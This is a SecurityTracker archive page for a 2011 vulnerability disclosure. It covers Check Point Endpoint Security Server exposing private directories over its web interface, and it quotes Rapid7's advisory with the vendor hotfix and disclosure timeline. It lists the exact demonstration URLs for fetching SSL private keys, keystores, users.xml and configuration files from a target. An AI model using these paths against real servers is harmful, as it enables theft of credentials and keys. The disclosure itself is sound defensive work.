SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Security)  >   Check Point Endpoint Security Server Vendors:   Check Point
Check Point Endpoint Security Server Discloses Private Data to Remote Users
SecurityTracker Alert ID:  1025051
SecurityTracker URL:  http://securitytracker.com/id/1025051
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 9 2011
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): R71, R73, R72; also Integrity Server 7.x
Description:   A vulnerability was reported in Check Point Endpoint Security Server. A remote user can download SSL private keys, configuration files, and other sensitive information.

Some demonstration exploit URLs are provided:

https://[target]/conf/ssl/apache/integrity-smartcenter.cert
https://[target]/conf/ssl/apache/integrity-smartcenter.key
https://[target]/conf/ssl/apache/integrity.cert
https://[target]/conf/ssl/apache/integrity.key
https://[target]/conf/ssl/apache/smartcenter.cert
https://[target]/conf/ssl/integrity-keystore.jks
https://[target]/conf/ssl/isskeys.jks
https://[target]/conf/ssl/openssl.pem
https://[target]/conf/integrity.xml
https://[target]/conf/jaas/users.xml
https://[target]/bin/DBSeed.xml
http://[target]:8080/conf/ssl/apache/integrity-smartcenter.cert

The vendor was notified on November 8, 2010.

HD Moore of Rapid7 reported this vulnerability.


Impact:   A remote user can download SSL private keys, configuration files, and other sensitive information.
Solution:   The vendor issued a hotfix in November 2010.

The vendor's advisory is available at:

https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk57881

Vendor URL:  www.checkpoint.com/ (Links to External Site)
Cause:   Access control error, Configuration error
Underlying OS:  Linux (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  R7-0038: Check Point Endpoint Security Server Information Disclosure

R7-0038: Check Point Endpoint Security Server Information Disclosure
February 7, 2011

-- Vulnerability Details:

The Check Point Endpoint Security Server and Integrity Server products inadvertently expose a number of private directories through the web interface. These directories include the SSL private keys, sensitive configuration files (often containing passwords), and application binaries. 

Examples of exposed files include:

https://server/conf/ssl/apache/integrity-smartcenter.cert
https://server/conf/ssl/apache/integrity-smartcenter.key
https://server/conf/ssl/apache/integrity.cert
https://server/conf/ssl/apache/integrity.key
https://server/conf/ssl/apache/smartcenter.cert
https://server/conf/ssl/integrity-keystore.jks
https://server/conf/ssl/isskeys.jks
https://server/conf/ssl/openssl.pem
https://server/conf/integrity.xml
https://server/conf/jaas/users.xml

https://server/bin/DBSeed.xml

These files are also exposed via the Tomcat server:

http://server:8080/conf/ssl/apache/integrity-smartcenter.cert



-- Vendor Response:
Check Point has issued a hotfix for Endpoint Security Server versions R71, R72 and R73 and Integrity Server version 7.

 https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk57881

This patch blocks remote access to the Tomcat instance (8080) and restricts access to private directories via POST and GET requests. This patch does not prevent a remote attacker from determining the size of a sensitive file by using HEAD requests. 


-- Disclosure Timeline:
2010-11-08 - Vulnerability reported to Check Point
2010-11-09 - Acknowledgement from Check Point
2010-11-29 - Advisory and hotfix released by Check Point
2011-01-19 - Remote check published for Rapid7 NeXpose
2011-02-07 - Detailed advisory released by Rapid7


-- Credit:
This vulnerability was discovered by HD Moore

-- About Rapid7 Security
Rapid7 provides vulnerability management, compliance and penetration
testing solutions for Web application, network and database security. In
addition to developing the NeXpose Vulnerability Management system,
Rapid7 manages the Metasploit Project and is the primary sponsor of the
W3AF web assessment tool.

Our vulnerability disclosure policy is available online at:

 http://www.rapid7.com/disclosure.jsp




 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC